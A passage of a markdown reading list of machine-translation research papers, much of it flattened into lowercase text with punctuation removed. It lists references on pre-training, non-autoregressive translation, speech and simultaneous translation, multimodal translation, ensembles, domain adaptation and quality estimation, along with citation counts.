aclweb org anthology n18 1202 in proceedings of naacl 2018 citation https scholar google com hk scholar cites 14181983828043963745 as sdt 2005 sciodt 0 5 hl en 519 jeremy howard and sebastian ruder 2018 universal language model fine tuning for text classification http aclweb org anthology p18 1031 in proceedings of acl 2018 citation https scholar google com hk scholar cites 2986760879834934707 as sdt 2005 sciodt 0 5 hl en 114 alexis conneau ruty rinott guillaume lample adina williams samuel bowman holger schwenk and veselin stoyanov 2018 xnli evaluating cross lingual sentence representations https www aclweb org anthology d18 1269 in proceedings of emnlp 2018 citation https scholar google com scholar um 1 ie utf 8 lr cites 15041461338388299895 9 alec radford karthik narasimhan tim salimans and ilya sutskever 2018 improving language understanding by generative pre training https s3 us west 2 amazonaws com openai assets research covers language unsupervised language understanding paper pdf technical report openai citation https 
scholar google com hk scholar cites 8939608408376234789 as sdt 2005 sciodt 0 5 hl en 94 guillaume lample and alexis conneau 2019 cross lingual language model pretraining https arxiv org pdf 1901 07291 arxiv 1901 07291 citation https scholar google com scholar um 1 ie utf 8 lr cites 11542237222100207278 3 jacob devlin ming wei chang kenton lee and kristina toutanova 2018 bert pre training of deep bidirectional transformers for language understanding https arxiv org pdf 1810 04805 in proceedings of naacl 2019 citation https scholar google com hk scholar cites 3166990653379142174 as sdt 2005 sciodt 0 5 hl en 292 alec radford jeffrey wu rewon child david luan dario amodei and ilya sutskever 2019 language models are unsupervised multitask learners https d4mucfpksywv cloudfront net better language models language models are unsupervised multitask learners pdf technical report openai citation https scholar google com scholar cites 7713405291981945630 as sdt 2005 sciodt 0 5 hl en 9 sergey edunov alexei baevski and michael auli 2019 pre trained language model representations for language generation https arxiv org pdf 1903 09722 pdf in proceedings of naacl 2019 citation https scholar google com scholar cites 46961033050134131 as sdt 2005 sciodt 0 5 hl en 1 kaitao song xu tan tao qin jianfeng lu and tie yan liu 2019 mass masked sequence to sequence pre training for language generation https arxiv org pdf 1905 02450 in proceedings of icml 2019 zhilin yang zihang dai yiming yang jaime carbonell ruslan salakhutdinov and quoc v le 2019 xlnet generalized autoregressive pretraining for language understanding https arxiv org pdf 1906 08237 arxiv 1906 08237 jiacheng yang mingxuan wang hao zhou chengqi zhao yong yu weinan zhang and lei li 2020 towards making the most of bert in neural machine translation https arxiv org abs 1908 05672 in proceedings of aaai 2020 rongxiang weng heng yu shujian huang shanbo cheng and weihua luo 2020 acquiring knowledge from pre trained model to neural 
machine translation https arxiv org abs 1912 01774 in proceedings of aaai 2020 jinhua zhu yingce xia lijun wu di he tao qin wengang zhou houqiang li tieyan liu 2020 incorporating bert into neural machine translation https openreview net forum id hyl7ygstwb in proceedings of iclr 2020 mike lewis yinhan liu naman goyal marjan ghazvininejad abdelrahman mohamed omer levy veselin stoyanov and luke zettlemoyer 2020 bart denoising sequence to sequence pre training for natural language generation translation and comprehension https arxiv org abs 1910 13461 in proceedings of acl 2020 thibault sellam dipanjan das and ankur parikh 2020 bleurt learning robust metrics for text generation https www aclweb org anthology 2020 acl main 704 in proceedings of acl 2020 sascha rothe shashi narayan and aliaksei severyn 2020 leveraging pre trained checkpoints for sequence generation tasks https transacl org ojs index php tacl article view 1849 transactions of the association for computational linguistics zhen yang bojie hu ambyera han shen huang qi ju 2020 csp code switching pre training for neural machine translation https www aclweb org anthology 2020 emnlp main 208 in proceedings of emnlp 2020 zehui lin xiao pan mingxuan wang xipeng qiu jiangtao feng hao zhou lei li 2020 pre training multilingual neural machine translation by leveraging alignment information https www aclweb org anthology 2020 emnlp main 210 in proceedings of emnlp 2020 junliang guo zhirui zhang linli xu hao ran wei boxing chen enhong chen 2020 incorporating bert into parallel sequence decoding with adapters https papers nips cc paper 2020 file 7a6a74cbe87bc60030a4bd041dd47b78 paper pdf in proceedings of neurips 2020 linqing chen junhui li zhengxian gong boxing chen weihua luo min zhang guodong zhou 2021 breaking the corpus bottleneck for context aware neural machine translation with cross task pre training https aclanthology org 2021 acl long 222 pdf in proceedings of acl 2021 h3 id nat non autoregressive translation 
h3 jiatao gu james bradbury caiming xiong victor o k li and richard socher 2018 non autoregressive neural machine translation https arxiv org abs 1711 02281 in proceedings of iclr 2018 citation https scholar google com hk scholar cites 3482831974828539059 as sdt 2005 sciodt 0 5 hl en 93 chunqi wang ji zhang and haiqing chen 2018 semi autoregressive neural machine translation http aclweb org anthology d18 1044 in proceedings of emnlp 2018 jason lee elman mansimov and kyunghyun cho 2018 deterministic non autoregressive neural sequence modeling by iterative refinement http aclweb org anthology d18 1149 in proceedings of emnlp 2018 jind ich libovick and jind ich helcl 2018 end to end non autoregressive neural machine translation with connectionist temporal classification http aclweb org anthology d18 1336 in proceedings of emnlp 2018 xuezhe ma chunting zhou xian li graham neubig and eduard hovy 2019 flowseq non autoregressive conditional sequence generation with generative flow https arxiv org pdf 1909 02480 in proceedings of emnlp 2019 zhuohan li zi lin di he fei tian tao qin liwei wang and tie yan liu 2019 hint based training for non autoregressive machine translation https arxiv org pdf 1909 06708 in proceedings of emnlp 2019 marjan ghazvininejad omer levy yinhan liu luke zettlemoyer 2019 mask predict parallel decoding of conditional masked language models https arxiv org abs 1904 09324 in proceedings of emnlp 2019 sean welleck kiant brantley hal daum iii and kyunghyun cho 2019 non monotonic sequential text generation https arxiv org pdf 1902 02192 in proceedings of icml 2019 mitchell stern william chan jamie kiros jakob uszkoreit 2019 insertion transformer flexible sequence generation via insertion operations http proceedings mlr press v97 stern19a stern19a pdf in proceedings of icml 2019 chenze shao yang feng jinchao zhang fandong meng xilin chen and jie zhou 2019 retrieving sequential information for non autoregressive neural machine translation https arxiv org 
pdf 1906 09444 in proceedings of acl 2019 bingzhen wei mingxuan wang hao zhou junyang lin and xu sun 2019 imitation learning for non autoregressive neural machine translation https www aclweb org anthology p19 1125 in proceedings of acl 2019 jiatao gu changhan wang junbo zhao 2019 levenshtein transformer https papers nips cc paper 9297 levenshtein transformer in proceedings of neurips 2019 junliang guo xu tan di he tao qin linli xu and tie yan liu 2019 non autoregressive neural machine translation with enhanced decoder input https arxiv org pdf 1812 09664 pdf in proceedings of aaai 2019 yiren wang fei tian di he tao qin chengxiang zhai and tie yan liu 2019 non autoregressive machine translation with auxiliary regularization https arxiv org pdf 1902 10245 pdf in proceedings of aaai 2019 junliang guo xu tan linli xu tao qin enhong chen tie yan liu 2020 fine tuning by curriculum learning for non autoregressive neural machine translation https arxiv org abs 1911 08717 in proceedings of aaai 2020 chenze shao jinchao zhang yang feng fandong meng and jie zhou 2020 minimizing the bag of ngrams difference for non autoregressive neural machine translation https arxiv org pdf 1911 09320 pdf in proceedings of aaai 2020 raphael shu jason lee hideki nakayama and kyunghyun cho 2020 latent variable non autoregressive neural machine translation with deterministic inference using a delta posterior https arxiv org abs 1908 07181 in proceedings of aaai 2020 jiawei zhou and phillip keung 2020 improving non autoregressive neural machine translation with monolingual data https arxiv org abs 2005 00932 in proceedings of acl 2020 marjan ghazvininejad vladimir karpukhin luke zettlemoyer and omer levy 2020 aligned cross entropy for non autoregressive machine translation https arxiv org abs 2004 01655 in proceedings of icml 2020 jungo kasai james cross marjan ghazvininejad and jiatao gu 2020 parallel machine translation with disentangled context transformer https arxiv org abs 2001 05136 in 
proceedings of icml 2020 junliang guo linli xu and enhong chen 2020 jointly masked sequence to sequence model for non autoregressive neural machine translation https www aclweb org anthology 2020 acl main 36 in proceedings of acl 2020 qiu ran yankai lin peng li and jie zhou 2020 learning to recover from multi modality errors for non autoregressive neural machine translation https www aclweb org anthology 2020 acl main 277 in proceedings of acl 2020 william chan mitchell stern jamie kiros jakob uszkoreit 2020 an empirical study of generation order for machine translation https www aclweb org anthology 2020 emnlp main 464 in proceedings of emnlp 2020 jason lee raphael shu kyunghyun cho 2020 iterative refinement in the continuous space for non autoregressive neural machine translation https www aclweb org anthology 2020 emnlp main 73 in proceedings of emnlp 2020 xiang kong zhisong zhang eduard hovy 2020 incorporating a local translation mechanism into non autoregressive translation https www aclweb org anthology 2020 emnlp main 79 in proceedings of emnlp 2020 chitwan saharia william chan saurabh saxena mohammad norouzi 2020 non autoregressive machine translation with latent alignments https www aclweb org anthology 2020 emnlp main 83 in proceedings of emnlp 2020 liang ding longyue wang di wu dacheng tao zhaopeng tu 2020 context aware cross attention for non autoregressive translation https www aclweb org anthology 2020 coling main 389 pdf in proceedings of coling 2020 jungo kasai nikolaos pappas hao peng james cross noah smith 2021 deep encoder shallow decoder reevaluating non autoregressive machine translation https openreview net pdf id kpfastalupq in proceedings of iclr 2021 liang ding longyue wang xuebo liu derek f wong dacheng tao zhaopeng tu 2021 understanding and improving lexical choice in non autoregressive translation https openreview net pdf id ztfesbix9c in proceedings of iclr 2021 qiu ran yankai lin peng li jie zhou 2021 guiding non autoregressive neural 
machine translation decoding with reordering information https arxiv org pdf 1911 02215 pdf in proceedings of aaai 2021 yongchang hao shilin he wenxiang jiao zhaopeng tu michael r lyu xing wang 2021 multi task learning with shared encoder for non autoregressive machine translation https www aclweb org anthology 2021 naacl main 313 pdf in proceedings of naacl 2021 yu bao shujian huang tong xiao dongqi wang xinyu dai jiajun chen 2021 non autoregressive translation by learning target categorical codes https www aclweb org anthology 2021 naacl main 458 pdf in proceedings of naacl 2021 liang ding longyue wang xuebo liu derek f wong dacheng tao zhaopeng tu 2021 progressive multi granularity training for non autoregressive translation https arxiv org pdf 2106 05546 pdf in proceedings of acl 2021 liang ding longyue wang xuebo liu derek f wong dacheng tao zhaopeng tu 2021 rejuvenating low frequency words making the most of parallel data in non autoregressive translation https arxiv org pdf 2106 00903 pdf in proceedings of acl 2021 cunxiao du zhaopeng tu jing jiang 2021 order agnostic cross entropy for non autoregressive machine translation https arxiv org pdf 2106 05093 pdf in proceedings of icml 2021 lihua qian hao zhou yu bao mingxuan wang lin qiu weinan zhang yong yu lei li 2021 glancing transformer for non autoregressive neural machine translation https aclanthology org 2021 acl long 155 pdf in proceedings of acl 2021 h3 id speech translation and simultaneous translation speech translation and simultaneous translation h3 matt post gaurav kumar adam lopez damianos karakos chris callison burch and sanjeev khudanpur 2013 improved speech to text translation with the fisher and callhome spanish english speech translation corpus http www mt archive info 10 iwslt 2013 post pdf in proceedings of iwslt 2013 citation https scholar google com hk scholar cites 11894485689812442585 as sdt 2005 sciodt 0 5 hl en 24 gaurav kumar matt post daniel povey and sanjeev khudanpur 2014 some 
insights from translating conversational telephone speech https ieeexplore ieee org abstract document 6854197 in proceedings of icassp 2014 citation https scholar google com hk scholar cites 8525865656244874295 as sdt 2005 sciodt 0 5 hl en 9 long duong antonios anastasopoulos david chiang steven bird and trevor cohn 2016 an attentional model for speech translation without transcription http www aclweb org anthology n16 1109 in proceedings of naacl 2016 citation https scholar google com hk scholar cites 17801967122712636447 as sdt 2005 sciodt 0 5 hl en 37 antonios anastasopoulos david chiang and long duong 2016 an unsupervised probability model for speech to translation alignment of low resource languages https aclweb org anthology d16 1133 in proceedings of emnlp 2016 citation https scholar google com hk scholar cites 323823800810193203 as sdt 2005 sciodt 0 5 hl en 9 ron j weiss jan chorowski navdeep jaitly yonghui wu and zhifeng chen 2017 sequence to sequence models can directly translate foreign speech https arxiv org abs 1703 08581 in proceedings of interspeech 2017 citation https scholar google com hk scholar cites 10073093152246570315 as sdt 2005 sciodt 0 5 hl en 41 jiatao gu graham neubig kyunghyun cho and victor o k li 2017 learning to translate in real time with neural machine translation http aclweb org anthology e17 1099 in proceedings of eacl 2017 citation https scholar google com hk scholar cites 14299891671990230013 as sdt 2005 sciodt 0 5 hl en 17 sameer bansal herman kamper adam lopez and sharon goldwater 2017 towards speech to text translation without speech recognition http aclweb org anthology e17 2076 in proceedings of eacl 2017 citation https scholar google com hk scholar cites 639319209334631051 as sdt 2005 sciodt 0 5 hl en 13 antonios anastasopoulos and david chiang 2018 tied multitask learning for neural speech translation https arxiv org pdf 1802 06655 pdf in proceedings of naacl 2018 citation https scholar google com hk scholar cites 
5810351802252447673 as sdt 2005 sciodt 0 5 hl en 10 fahim dalvi nadir durrani hassan sajjad and stephan vogel 2018 incremental decoding and training methods for simultaneous translation in neural machine translation http aclweb org anthology n18 2079 in proceedings of naacl 2018 craig stewart nikolai vogler junjie hu jordan boyd graber and graham neubig 2018 automatic estimation of simultaneous interpreter performance http aclweb org anthology p18 2105 in proceedings of acl 2018 citation https scholar google com hk scholar cites 5687670489913511293 as sdt 2005 sciodt 0 5 hl en 1 florian dessloch thanh le ha markus m ller jan niehues thai son nguyen ngoc quan pham elizabeth salesky matthias sperber sebastian st ker thomas zenkel and alexander waibel 2018 kit lecture translator multilingual speech translation with one shot learning http aclweb org anthology c18 2020 in proceedings of coling 2018 ashkan alinejad maryam siahbani and anoop sarkar 2018 prediction improves simultaneous neural machine translation http aclweb org anthology d18 1337 in proceedings of emnlp 2018 sameer bansal herman kamper karen livescu adam lopez and sharon goldwater 2019 pre training on high resource speech recognition improves low resource speech to text translation https arxiv org pdf 1809 01431 pdf in proceedings of naacl 2019 nikolai vogler craig stewart and graham neubig 2019 lost in interpretation predicting untranslated terminology in simultaneous interpretation https arxiv org pdf 1904 00930 pdf in proceedings of naacl 2019 elizabeth salesky matthias sperber and alex waibel 2019 fluent translations from disfluent speech in end to end speech translation https arxiv org pdf 1906 00556 in proceedings of naacl 2019 naveen arivazhagan colin cherry wolfgang macherey chung cheng chiu semih yavuz ruoming pang wei li and colin raffel 2019 monotonic infinite lookback attention for simultaneous machine translation https arxiv org pdf 1906 05218 in proceedings of acl 2019 matthias sperber 
graham neubig ngoc quan pham and alex waibel 2019 self attentional models for lattice inputs https arxiv org pdf 1906 01617 in proceedings of acl 2019 pei zhang boxing chen niyu ge and kai fan 2019 lattice transformer for speech translation https arxiv org pdf 1906 05551 in proceedings of acl 2019 naveen arivazhagan colin cherry wolfgang macherey chung cheng chiu semih yavuz ruoming pang wei li and colin raffel 2019 monotonic infinite lookback attention for simultaneous machine translation https www aclweb org anthology p19 1126 in proceedings of acl 2019 elizabeth salesky matthias sperber and alan w black 2019 exploring phoneme level speech representations for end to end speech translation https www aclweb org anthology p19 1179 in proceedings of acl 2019 mingbo ma liang huang hao xiong renjie zheng kaibo liu baigong zheng chuanqiang zhang zhongjun he hairong liu xing li hua wu and haifeng wang 2019 stacl simultaneous translation with implicit anticipation and controllable latency using prefix to prefix framework https www aclweb org anthology p19 1289 in proceedings of acl 2019 baigong zheng renjie zheng mingbo ma and liang huang 2019 simultaneous translation with flexible policy via restricted imitation learning https www aclweb org anthology p19 1582 in proceedings of acl 2019 matthias sperber graham neubig jan niehues alex waibel 2019 attention passing models for robust and data efficient end to end speech translation https www mitpressjournals org doi pdf 10 1162 tacl a 00270 transactions of the association for computational linguistics baigong zheng renjie zheng mingbo ma and liang huang 2019 simpler and faster learning of adaptive policies for simultaneous translation https arxiv org pdf 1909 01559 in proceedings of emnlp 2019 renjie zheng mingbo ma baigong zheng and liang huang 2019 speculative beam search for simultaneous translation https arxiv org pdf 1909 05421 in proceedings of emnlp 2019 jiatao gu changhan wang junbo zhao 2019 levenshtein transformer 
https papers nips cc paper 9297 levenshtein transformer in proceedings of neurips 2019 chengyi wang yu wu shujie liu ming zhou and zhenglu yang 2020 curriculum pre training for end to end speech translation https arxiv org abs 2004 10093 in proceedings of acl 2020 elizabeth salesky and alan w black 2020 phone features improve speech translation https arxiv org abs 2005 13681 in proceedings of acl 2020 matthias sperber and matthias paulik 2020 speech translation and the end to end promise taking stock of where we are https arxiv org abs 2004 06358 in proceedings of acl 2020 renjie zheng mingbo ma baigong zheng kaibo liu and liang huang 2020 opportunistic decoding with timely correction for simultaneous translation https arxiv org abs 2005 00675 in proceedings of acl 2020 baigong zheng kaibo liu renjie zheng mingbo ma hairong liu and liang huang 2020 simultaneous translation policies from fixed to adaptive http arxiv org abs 2004 13169 in proceedings of acl 2020 shun po chuang tzu wei sung alexander h liu and hung yi lee 2020 worse wer but better bleu leveraging word embedding as intermediate in multitask end to end speech translation https arxiv org abs 2005 10678 in proceedings of acl 2020 yi ren jinglin liu xu tan chen zhang tao qin zhou zhao and tie yan liu 2020 simulspeech end to end simultaneous speech to text translation https www aclweb org anthology 2020 acl main 350 in proceedings of acl 2020 ashkan alinejad anoop sarkar 2020 effectively pretraining a speech translation decoder with machine translation data https www aclweb org anthology 2020 emnlp main 644 in proceedings of emnlp 2020 ruiqing zhang chuanqiang zhang zhongjun he hua wu haifeng wang 2020 learning adaptive segmentation policy for simultaneous translation https www aclweb org anthology 2020 emnlp main 178 in proceedings of emnlp 2020 ozan caglayan julia ive veneta haralampieva pranava madhyastha lo c barrault lucia specia 2020 simultaneous machine translation with visual context https www 
aclweb org anthology 2020 emnlp main 184 in proceedings of emnlp 2020 javier iranzo s nchez adri gim nez pastor joan albert silvestre cerd pau baquero arnal jorge civera saiz alfons juan 2020 direct segmentation models for streaming speech translation https www aclweb org anthology 2020 emnlp main 206 in proceedings of emnlp 2020 h3 id multi modality multi modality h3 julian hitschler shigehiko schamoni stefan riezler 2016 multimodal pivots for image caption translation http aclweb org anthology p16 1227 in proceedings of acl 2016 citation https scholar google com scholar oi bibs hl en cites 2998317485328832141 34 lucia specia stella frank khalil sima an and desmond elliott 2016 a shared task on multimodal machine translation and crosslingual image description http aclweb org anthology w16 2346 in proceedings of the first conference on machine translation volume 2 shared task papers citation https scholar google com hk scholar hl en as sdt 2005 sciodt 0 5 cites 10227072007263391757 scipsc 47 sergio rodr guez guasch marta r costa juss 2016 wmt 2016 multimodal translation system description based on bidirectional recurrent neural networks with double embeddings http aclweb org anthology w16 2362 in proceedings of the first conference on machine translation volume 2 shared task papers citation https scholar google com hk scholar cites 4203794059992068345 as sdt 2005 sciodt 0 5 hl en 2 po yao huang frederick liu sz rung shiang jean oh and chris dyer 2016 attention based multimodal neural machine translation https www aclweb org anthology w16 2360 in proceedings of the first conference on machine translation volume 2 shared task papers citation https scholar google com hk scholar cites 3098391471855879500 as sdt 2005 sciodt 0 5 hl en 34 iacer calixto desmond elliott and stella frank 2016 dcu uva multimodal mt system report http aclweb org anthology w16 2359 in proceedings of the first conference on machine translation volume 2 shared task papers citation https scholar 
google com hk scholar cites 13635685318707561524 as sdt 2005 sciodt 0 5 hl en 12 kashif shah josiah wang and lucia specia 2016 shef multimodal grounding machine translation on images https aclweb org anthology w16 2363 in proceedings of the first conference on machine translation volume 2 shared task papers citation https scholar google com scholar cites 11223367231679829742 as sdt 5 39 sciodt 0 39 hl en 17 desmond elliott stella frank lo c barrault fethi bougares and lucia specia 2017 findings of the second shared task on multimodal machine translation and multilingual image description http aclweb org anthology w17 4718 in proceedings of the second conference on machine translation citation https scholar google com hk scholar cites 268734032292286129 as sdt 2005 sciodt 0 5 hl en 24 iacer calixto qun liu and nick campbell 2017 doubly attentive decoder for multi modal neural machine translation http aclweb org anthology p17 1175 in proceedings of acl 2017 citation https scholar google com hk scholar cites 9882133753270023054 as sdt 2005 sciodt 0 5 hl en 31 jean benoit delbrouck and st phane dupont 2017 an empirical study on the effectiveness of images in multimodal neural machine translation http aclweb org anthology d17 1095 in proceedings of emnlp 2017 citation https scholar google com hk scholar cites 4462543203996753904 as sdt 2005 sciodt 0 5 hl en 2 iacer calixto and qun liu 2017 incorporating global visual features into attention based neural machine translation http aclweb org anthology d17 1105 in proceedings of emnlp 2017 citation https scholar google com hk scholar cites 6076628072948213440 as sdt 2005 sciodt 0 5 hl en 14 jason lee kyunghyun cho jason weston and douwe kiela 2018 emergent translation in multi agent communication https openreview net pdf id h1vexaxa in proceedings of iclr 2018 citation https scholar google com hk scholar cites 16875774594076963034 as sdt 2005 sciodt 0 5 hl en 8 yun chen yang liu and victor o k li 2018 zero resource neural 
machine translation with multi agent communication game https arxiv org pdf 1802 03116 in proceedings of aaai 2018 citation https scholar google com hk scholar cites 13902575159717479954 as sdt 2005 sciodt 0 5 hl en 6 lo c barrault fethi bougares lucia specia chiraag lala desmond elliott and stella frank 2018 findings of the third shared task on multimodal machine translation http aclweb org anthology w18 6402 in proceedings of the third conference on machine translation shared task papers citation https scholar google com hk scholar cites 1407951263246368352 as sdt 2005 sciodt 0 5 hl en 1 john hewitt daphne ippolito brendan callahan reno kriz derry tanti wijaya and chris callison burch 2018 learning translations via images with a massively multilingual image dataset http aclweb org anthology p18 1239 in proceedings of acl 2018 citation https scholar google com hk scholar cites 8128328221941110465 as sdt 2005 sciodt 0 5 hl en 1 mingyang zhou runxiang cheng yong jae lee and zhou yu 2018 a visual attention grounding neural model for multimodal machine translation http aclweb org anthology d18 1400 in proceedings of emnlp 2018 desmond elliott 2018 adversarial evaluation of multimodal machine translation http aclweb org anthology d18 1329 in proceedings of emnlp 2018 ozan caglayan pranava madhyastha lucia specia and lo c barrault 2019 probing the need for visual context in multimodal machine translation https arxiv org pdf 1903 08678 pdf in proceedings of naacl 2019 iacer calixto miguel rios and wilker aziz 2019 latent variable model for multi modal translation https arxiv org pdf 1811 00357 in proceedings of acl 2019 julia ive pranava madhyastha and lucia specia 2019 distilling translations with visual awareness https arxiv org pdf 1906 07701 in proceedings of acl 2019 zhuosheng zhang kehai chen rui wang masao utiyama eiichiro sumita zuchao li hai zhao 2020 neural machine translation with universal visual representation https openreview net forum id byl8hhnyps in 
proceedings of iclr 2020 po yao huang junjie hu xiaojun chang and alexander hauptmann 2020 unsupervised multimodal neural machine translation with pseudo visual pivoting http arxiv org abs 2005 03119 in proceedings of acl 2020 shu okabe fr d ric blain and lucia specia 2020 multimodal quality estimation for machine translation https www aclweb org anthology 2020 acl main 114 in proceedings of acl 2020 shaowei yao and xiaojun wan 2020 multimodal transformer for multimodal machine translation https www aclweb org anthology 2020 acl main 400 in proceedings of acl 2020 shuo sun francisco guzm n and lucia specia 2020 are we estimating or guesstimating translation quality https www aclweb org anthology 2020 acl main 558 in proceedings of acl 2020 ozan caglayan julia ive veneta haralampieva pranava madhyastha lo c barrault lucia specia 2020 simultaneous machine translation with visual context https www aclweb org anthology 2020 emnlp main 184 in proceedings of emnlp 2020 h3 id ensemble reranking ensemble and reranking h3 ekaterina garmash and christof monz 2016 ensemble learning for multi source neural machine translation http aclweb org anthology c16 1133 in proceedings of coling 2016 citation https scholar google com scholar cites 10720572689338720536 as sdt 2005 sciodt 0 5 hl en 18 long zhou wenpeng hu jiajun zhang and chengqing zong 2017 neural system combination for machine translation http aclweb org anthology p17 2060 in proceedings of acl 2017 citation https scholar google com scholar cites 2547807449547851378 as sdt 2005 sciodt 0 5 hl en 21 jiaji huang yi li wei ping and liang huang 2018 large margin neural language model http aclweb org anthology d18 1150 in proceedings of emnlp 2018 tianxiao shen myle ott michael auli and marc aurelio ranzato 2019 mixture models for diverse machine translation tricks of the trade http proceedings mlr press v97 shen19c shen19c pdf in proceedings of icml 2019 yiren wang lijun wu yingce xia tao qin chengxiang zhai and tie yan liu 
2020. [Transductive Ensemble Learning for Neural Machine Translation](https://publish.illinois.edu/yirenwang). In Proceedings of AAAI 2020.

<h3 id="domain-adaptation">Domain Adaptation</h3>

* Chenhui Chu, Raj Dabre, and Sadao Kurohashi. 2017. [An Empirical Comparison of Domain Adaptation Methods for Neural Machine Translation](http://aclweb.org/anthology/P17-2061). In Proceedings of ACL 2017. ([Citation](https://scholar.google.com.hk/scholar?cites=11154619650853156425&as_sdt=2005&sciodt=0,5&hl=en): 40)
* Rui Wang, Andrew Finch, Masao Utiyama, and Eiichiro Sumita. 2017. [Sentence Embedding for Neural Machine Translation Domain Adaptation](http://aclweb.org/anthology/P17-2089). In Proceedings of ACL 2017. ([Citation](https://scholar.google.com.hk/scholar?cites=12026801731726213856&as_sdt=2005&sciodt=0,5&hl=en): 8)
* Boxing Chen, Colin Cherry, George Foster, and Samuel Larkin. 2017. [Cost Weighting for Neural Machine Translation Domain Adaptation](http://aclweb.org/anthology/W17-3205). In Proceedings of the First Workshop on Neural Machine Translation. ([Citation](https://scholar.google.com.hk/scholar?cites=11511062396100603245&as_sdt=2005&sciodt=0,5&hl=en): 10)
* Reid Pryzant and Denny Britz. 2017. [Effective Domain Mixing for Neural Machine Translation](http://aclweb.org/anthology/W17-4712). In Proceedings of the Second Conference on Machine Translation. ([Citation](https://scholar.google.com.hk/scholar?cites=5830143292179945460&as_sdt=2005&sciodt=0,5&hl=en): 6)
* Mara Chinea-Rios, Álvaro Peris, and Francisco Casacuberta. 2017. [Adapting Neural Machine Translation with Parallel Synthetic Data](http://aclweb.org/anthology/W17-4714). In Proceedings of the Second Conference on Machine Translation. ([Citation](https://scholar.google.com/scholar?cites=14166012599677352590&as_sdt=2005&sciodt=0,5&hl=en): 3)
* Rui Wang, Masao Utiyama, Lemao Liu, Kehai Chen, and Eiichiro Sumita. 2017. [Instance Weighting for Neural Machine Translation Domain Adaptation](http://aclweb.org/anthology/D17-1155). In Proceedings of EMNLP 2017. ([Citation](https://scholar.google.com.hk/scholar?cites=11790197905041828318&as_sdt=2005&sciodt=0,5&hl=en): 13)
* Antonio Valerio Miceli Barone, Barry Haddow, Ulrich Germann, and Rico Sennrich. 2017. [Regularization Techniques for Fine-tuning in Neural Machine Translation](http://aclweb.org/anthology/D17-1156). In Proceedings of EMNLP 2017. ([Citation](https://scholar.google.com.hk/scholar?cites=10429379661740278678&as_sdt=2005&sciodt=0,5&hl=en): 6)
* David Vilar. 2018. [Learning Hidden Unit Contribution for Adapting Neural Machine Translation Models](http://aclweb.org/anthology/N18-2080). In Proceedings of NAACL 2018. ([Citation](https://scholar.google.com.hk/scholar?cites=5262017870970882749&as_sdt=2005&sciodt=0,5&hl=en): 2)
* Paul Michel and Graham Neubig. 2018. [Extreme Adaptation for Personalized Neural Machine Translation](http://aclweb.org/anthology/P18-2050). In Proceedings of ACL 2018. ([Citation](https://scholar.google.com.hk/scholar?cites=16717798879574507487&as_sdt=2005&sciodt=0,5&hl=en): 6)
* Shiqi Zhang and Deyi Xiong. 2018. [Sentence Weighting for Neural Machine Translation Domain Adaptation](http://aclweb.org/anthology/C18-1269). In Proceedings of COLING 2018.
* Chenhui Chu and Rui Wang. 2018. [A Survey of Domain Adaptation for Neural Machine Translation](http://aclweb.org/anthology/C18-1111). In Proceedings of COLING 2018. ([Citation](https://scholar.google.com.hk/scholar?cites=12774117070156464640&as_sdt=2005&sciodt=0,5&hl=en): 7)
* Jiali Zeng, Jinsong Su, Huating Wen, Yang Liu, Jun Xie, Yongjing Yin, and Jianqiang Zhao. 2018. [Multi-Domain Neural Machine Translation with Word-Level Domain Context Discrimination](http://aclweb.org/anthology/D18-1041). In Proceedings of EMNLP 2018.
* Graham Neubig and Junjie Hu. 2018. [Rapid Adaptation of Neural Machine Translation to New Languages](http://aclweb.org/anthology/D18-1103). In Proceedings of EMNLP 2018. ([Citation](https://scholar.google.com.hk/scholar?cites=18133973017615911986&as_sdt=2005&sciodt=0,5&hl=en): 4)
* Shuhao Gu, Yang Feng, and Qun Liu. 2019. [Improving Domain Adaptation Translation with Domain Invariant and Specific Information](https://arxiv.org/pdf/1904.03879.pdf). In Proceedings of NAACL 2019.
* Ankur Bapna and Orhan Firat. 2019. [Non-Parametric Adaptation for Neural Machine Translation](https://arxiv.org/pdf/1903.00058.pdf). In Proceedings of NAACL 2019.
* Junjie Hu, Mengzhou Xia, Graham Neubig, and Jaime Carbonell. 2019. [Domain Adaptation of Neural Machine Translation by Lexicon Induction](https://arxiv.org/pdf/1906.00376). In Proceedings of ACL 2019.
* Danielle Saunders, Felix Stahlberg, Adria de Gispert, and Bill Byrne. 2019. [Domain Adaptive Inference for Neural Machine Translation](https://arxiv.org/pdf/1906.00408). In Proceedings of ACL 2019.
* Zi-Yi Dou, Junjie Hu, Antonios Anastasopoulos, and Graham Neubig. 2019. [Unsupervised Domain Adaptation for Neural Machine Translation with Domain-Aware Feature Embeddings](https://arxiv.org/pdf/1908.10430.pdf). In Proceedings of EMNLP 2019.
* Ankur Bapna, Naveen Arivazhagan, and Orhan Firat. 2019. [Simple, Scalable Adaptation for Neural Machine Translation](https://arxiv.org/pdf/1909.08478). In Proceedings of EMNLP 2019.
* Jiali Zeng, Yang Liu, Jinsong Su, Yubing Ge, Yaojie Lu, Yongjing Yin, and Jiebo Luo. 2019. [Iterative Dual Domain Adaptation for Neural Machine Translation](https://www.aclweb.org/anthology/D19-1078.pdf). In Proceedings of EMNLP 2019.
* Wei Wang, Ye Tian, Jiquan Ngiam, Yinfei Yang, Isaac Caswell, and Zarana Parekh. 2020. [Learning a Multi-Domain Curriculum for Neural Machine Translation](https://arxiv.org/abs/1908.10940). In Proceedings of ACL 2020.
* Chaojun Wang and Rico Sennrich. 2020. [On Exposure Bias, Hallucination and Domain Shift in Neural Machine Translation](https://arxiv.org/abs/2005.03642). In Proceedings of ACL 2020.
* Haoming Jiang, Chen Liang, Chong Wang, and Tuo Zhao. 2020. [Multi-Domain Neural Machine Translation with Word-Level Adaptive Layer-wise Domain Mixing](https://www.aclweb.org/anthology/2020.acl-main.165). In Proceedings of ACL 2020.
* Anna Currey, Prashant Mathur, and Georgiana Dinu. 2020. [Distilling Multiple Domains for Neural Machine Translation](https://www.aclweb.org/anthology/2020.emnlp-main.364). In Proceedings of EMNLP 2020.
* Haoyue Shi, Luke Zettlemoyer, and Sida I. Wang. 2021. [Bilingual Lexicon Induction via Unsupervised Bitext Construction and Word Alignment](https://aclanthology.org/2021.acl-long.67). In Proceedings of ACL 2021.

<h3 id="quality-estimation">Quality Estimation</h3>

* Julia Kreutzer, Shigehiko Schamoni, and Stefan Riezler. 2015. [QUality Estimation from ScraTCH (QUETCH): Deep Learning for Word-level Translation Quality Estimation](http://www.aclweb.org/anthology/W15-3037). In Proceedings of the Tenth Workshop on Statistical Machine Translation. ([Citation](https://scholar.google.com/scholar?cites=2308754825624963103&as_sdt=2005&sciodt=0,5&hl=en): 24)
